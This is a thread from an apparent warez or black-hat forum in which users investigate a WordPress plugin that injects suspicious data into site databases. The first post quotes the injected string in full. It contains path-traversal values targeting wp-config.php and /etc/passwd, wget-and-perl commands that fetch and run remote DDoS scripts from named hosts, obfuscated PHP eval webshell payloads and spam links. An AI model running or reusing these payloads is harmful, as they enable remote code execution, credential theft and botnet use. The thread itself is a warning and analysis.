35.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

01-12-2018, 03:53 AM
Post: #1
Read this If you have installed Hide My WP Untouched
Hi all,

I recently download (Hide My WP Untouched) here and installed then I found some code on my database 'wp_options' :

PHP Code:
s:2530:"file=../../../../../../wp-config.php,file=../../../../../wp-config.php,file=../../wp-config.php,file=/path/wp-config.php,path=../../, _mysite_download_skin=../../../../../wp-config.php, fileName=../../../../../../../../../../etc/passwd, files=../../../../wp-config.php,file=../wp-config.php, img=../wp-config.php,screen_id=plugin-editor, pwd=!@#,pwd=$#,download=../../../wp-config.php, var=../../../wp-config.php,download_file=../../../wp-config.php, path=../../../../../../../wp-config.php, f=../../../../wp-config.php,filename=../../../../wp-config.php,video=../wp-config.php, href=../../../../wp-config.php, file=file:///var/www/wp-config.php, file=../../../wp-config.php,imgurl=../../../../wp-config.php, imgname=../../../wp-config.php, src=../../../../wp-config.php, data=../../../../wp-config.php, img=../../.my.cnf, download_backup_file=../wp-config.php, gform_unique_id=../../../../../,cmd=wget http://shunceng.altervista.org/irc//dos.txt ;lwp-download http://shunceng.altervista.org/irc//dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl dos.txt ; perl ddos.txt ; rm -rf dos.*, shxxx=cd /tmp;wget http://chel.bit-ecol.ru/wp-includes/ID3/robots;perl robots;perl robots;perl robots;perl robots;perl robots;rm -rf robo*,cmd=wget http://suryaselindo.co.id//plugins/content/multithumb/stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; perl stats.txt ; rm -rf stats*,form_id=../../, upload-dir=./../../,z=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,message=d <a href="http://cialis24h.party/#8746">buy cialis online safely</a> buy cialis online uk, #=eval("echo 10000000000-245205634;");, x=../../wp-config.php, mdocs-img-preview=../../..-/wp-config.php, data=../../..-/wp-config.php,coco=@eval(base64_decode($_POST[z0]));,filename=../../../../../../../../../etc/passwd,q071238=echo '%%%' . 'q071238' . '%%%';, calendar_id=../../../../wp-config.php,id=../../../../../../wp-config.php, src=http://free-games.top/tmp/db.php,q=/wp-config.php~,coco=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));,coco=@, coco=eval(urldecode(urldecode($_POST[chr(99).chr(111).chr(100).chr(101).chr(122)])));, z=@eval/**/(${\'_P\'.\'OST\'}[z9]/**/(${\'_POS\'.\'T\'}[z0]));, gform_unique_id=../../../, file=/path/wp-config.php, bot=eval("echo 10000000000-245205634;");, uploader_dir=./UmpSiX, uploader_dir=DbtXLd, uploader_dir=./ADLAyD, uploader_dir=./DVwEgu, uploader_dir=./gWAlvS, file_path=../../../../wp-config.php,bot=eval("echo 10000000000-245205634;");, fname=../../wp-config.php, chdir=./";} 

Try to check your website database by searching for: trust_network_rules or pp_important_messages and see if you can find this crappy code inside..

Untouched my A.S.S :(

If someone know what this code do please do add a reply.
01-12-2018, 04:47 AM
Post: #2
RE: Read this If you have installed Hide My WP Untouched
It's easy... You can read everything from that code...
This script is placing ads on your website and "hacker" can use your server as a botnet...
If this is from untouched version from this forum @Chupach need to be banned... I will take a look at his version...
01-12-2018, 06:00 AM
Post: #3
RE: Read this If you have installed Hide My WP Untouched
How do you know it was Hide My WP Untouched. It could be a million other reasons for the injection. Check you logs!
01-12-2018, 06:38 AM
Post: #4
RE: Read this If you have installed Hide My WP Untouched
(01-12-2018 06:00 AM)bale Wrote:  How do you know it was Hide My WP Untouched. It could be a million other reasons for the injection. Check you logs!

I am 100% sure this plugin is infected, I installed 3 times and every time I found this code add to my database..

Please try to install and save the setting first then go to your database and search searching for:

Code:
trust_network_rules
pp_important_messages

The code is inside these files.
01-12-2018, 06:42 AM (This post was last modified: 01-12-2018 06:43 AM by b1tr0t.)
Post: #5
RE: Read this If you have installed Hide My WP Untouched
Yep. Even if it says untouched, you can't trust it.

Unless I absolutely know for sure, such as a group buy, I don't use plugins from forums on production sites. I will install them on a sandbox site, then evaluate for purchase.

Just not worth the risk.
25.gif
01-12-2018, 07:10 AM
Post: #6
RE: Read this If you have installed Hide My WP Untouched
Now I installed the 4 time with a clean WordPress installation and this plugin!! WOW!! Beware Guys This Is Infected Plugin and I will check the other plugins shared by "Chupach" if the have the similar tricks
01-12-2018, 03:07 PM
Post: #7
RE: Read this If you have installed Hide My WP Untouched
You are right. I did a fresh wp install and it does create that crap. Now I'm not sure if there's something injected in the actual script or its coming from their server. I will compare to other versions I have from different sources. Maybe someone has a purchased version and can help out.
01-12-2018, 05:03 PM (This post was last modified: 01-12-2018 05:17 PM by Chupach.)
Post: #8
RE: Read this If you have installed Hide My WP Untouched
Hi everyone,

Someone mentioned me here :) First of all, I'm sorry if this make you confused. I swear I didn't that. I also give you the purchase code and latest version of Hide My WP plugin (5.5.5) to verify it. PM me if you need that. And you also check my other shares on forum such as Yoast SEO, WP-Rocket, Newspaper etc... If you figure out the same snippet code above in these stuffs, I will agree to my account's blocked.

Thanks


I have account on Hide My WP website support which need purchased code to registation: https://imgur.com/OnasEtg
01-12-2018, 05:27 PM
Post: #9
RE: Read this If you have installed Hide My WP Untouched
I can confirm that a purchased copy does the same. So Chupach has no blame here. Its something at their end. Maybe this call http://api.wpwave.com/important_message.php
01-12-2018, 05:37 PM
Post: #10
RE: Read this If you have installed Hide My WP Untouched
(01-12-2018 05:27 PM)bale Wrote:  I can confirm that a purchased copy does the same. So Chupach has no blame here. Its something at their end. Maybe this call http://api.wpwave.com/important_message.php

Thanks for your explaint. I will report this to Envato.
8.gif
Unzip/rar password: bestblackhatforum.com
BBHF Flat Style for BestBlackHatForum.Com: http://bestblackhatforum.com/Thread-GET-...tForum-Com




6.gif